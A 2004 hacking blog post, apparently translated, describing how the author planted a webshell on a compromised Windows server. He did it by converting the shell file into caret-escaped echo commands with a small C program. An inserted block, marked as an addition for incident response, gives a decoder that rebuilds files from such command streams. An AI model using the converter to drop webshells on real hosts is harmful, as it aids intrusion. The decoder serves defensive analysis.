A program for echoing a file


While exploiting an overflow with SQLHELLO, I got a shell and tried the AT command. It could be executed, so I seemed to have admin privileges, but the NET, FTP and TFTP commands could not be used. Hmm, so how do I upload a file?

Oh, okay, that will not stop me. Just echo a WebShell from the command line and go from there.

Even echoing a small script of only a few lines by hand is exhausting, so I wrote a program in C to prepare the commands.

The principle is very simple: put "echo " in front of each line of the file, append ">> echofile.txt" to it, and take care to put a ^ before each special symbol (<, >, &, |, ", ^).

The code is as follows:

    #include "stdio.h"
    #include <stdlib.h>   /* exit() */

    /* so: file to convert; sa: file name the echo commands append to */
    void echo(char so[30], char sa[30])
    {
        FILE *fp1, *fp2;
        int ch, last = '\n';   /* int, so EOF can be told apart from data */

        if ((fp1 = fopen(so, "r")) == NULL) {
            printf("Don't open file %s\n", so);
            exit(0);
        }
        if ((fp2 = fopen("echofile.txt", "w")) == NULL) {
            printf("Don't create file\n");
            exit(0);
        }
        fputs("echo ", fp2);
        while ((ch = fgetc(fp1)) != EOF) {
            if (ch == '^' || ch == '<' || ch == '>' || ch == '&' || ch == '|' || ch == '"') {
                fputc('^', fp2);          /* escape the special symbol */
                fputc(ch, fp2);
            } else if (ch == '\n') {
                fputs(" >> ", fp2);       /* close this line, start the next */
                fputs(sa, fp2);
                fputs("\n", fp2);
                fputs("echo ", fp2);
            } else {
                fputc(ch, fp2);
            }
            last = ch;
        }
        if (last != '\n') {               /* last line had no newline: redirect it too */
            fputs(" >> ", fp2);
            fputs(sa, fp2);
            fputs("\n", fp2);
        }
        fclose(fp1);
        fclose(fp2);
        printf("done!\n");
    }

    int main(int argc, char *argv[])
    {
        if (argc != 3) {
            printf("\n-----------------------------------------------------------------\n");
            printf("| echo file, by Lake2 (http://mrhupo.126.com) 2004/109 |\n");
            printf("-----------------------------------------------------------------\n");
            printf("- i will write a file to echo-file lake2.txt :)\n");
            printf("-usage:\n");
            printf("%s\n", argv[0]);
            printf("-example:\n%s cmd.aspx cmd.txt\n", argv[0]);
            return 0;
        }
        echo(argv[1], argv[2]);
        return 0;
    }

The program takes two parameters: the shell file name and the file name to generate. It produces the echofile.txt file, which contains all the echo commands to enter (heh, sometimes there will be one extra echo, but that does no harm ^_^).

Copy it one line at a time now? Oh, of course there is no need. Copy all of the content and paste it into the shell. Each carriage return on the command line automatically executes the command before it. Now take a quick look: the webshell has been generated ^_^

One more question: in this situation, is there any other way to upload a file?
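For incident response the transformation can be run backwards: the block below is an added example, not part of the original post, that decodes a captured stream of `echo ... >> file` commands into the text they wrote. The function names and the sample input are constructed here, and it assumes only the caret escaping described above and a command stream without shell prompts.

```c
#include <string.h>

/* Decode one "echo <escaped text> >> <target>" line back to the source text.
 * Returns the decoded length, or -1 if the line is not an echo-append command. */
int decode_echo_line(const char *line, char *out, size_t outsz, char *target, size_t tsz)
{
    size_t n = 0;
    if (strncmp(line, "echo ", 5) != 0) return -1;
    for (const char *p = line + 5; *p && *p != '\n'; p++) {
        if (*p == '^' && p[1] && p[1] != '\n') {
            p++;                                   /* ^x: keep x literally */
        } else if (p[0] == '>' && p[1] == '>') {   /* unescaped >> ends the text */
            for (p += 2; *p == ' '; p++) ;
            size_t t = strcspn(p, "\r\n");
            if (t == 0 || t >= tsz) return -1;
            memcpy(target, p, t); target[t] = '\0';
            if (n > 0 && out[n - 1] == ' ') n--;   /* generator's separator space */
            out[n] = '\0';
            return (int)n;
        }
        if (n + 1 >= outsz) return -1;
        out[n++] = *p;
    }
    return -1;                                     /* no redirect: not a match */
}

/* Rebuild the written file from a command stream. Lines that do not match
 * (other commands, the generator's trailing bare "echo ") are skipped.
 * Returns the number of lines recovered; target gets the last file name seen. */
int rebuild_file(const char *script, char *out, size_t outsz, char *target, size_t tsz)
{
    int lines = 0;
    size_t used = 0;
    char buf[1024];
    for (const char *p = script; *p; p += (*p == '\n')) {
        int n = decode_echo_line(p, buf, sizeof buf, target, tsz);
        if (n >= 0 && used + (size_t)n + 2 <= outsz) {
            memcpy(out + used, buf, (size_t)n); used += (size_t)n;
            out[used++] = '\n'; lines++;
        }
        p += strcspn(p, "\n");
    }
    out[used] = '\0';
    return lines;
}

/* Constructed sample: generator output for a two-line file, target out.txt. */
static const char SAMPLE[] = "echo ^<b^>a ^& b^</b^> >> out.txt\n"
                             "echo say ^\"hi^\" ^^ ^| done >> out.txt\n"
                             "echo ";
```

cmd.exe also writes the separator space before `>>`, so the file on the host carries one trailing space per line that the decoder strips to recover the source text.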

By lake2 2004-10-10

When reposting, please cite the original address: https://www.9cbs.com/read-89258.html
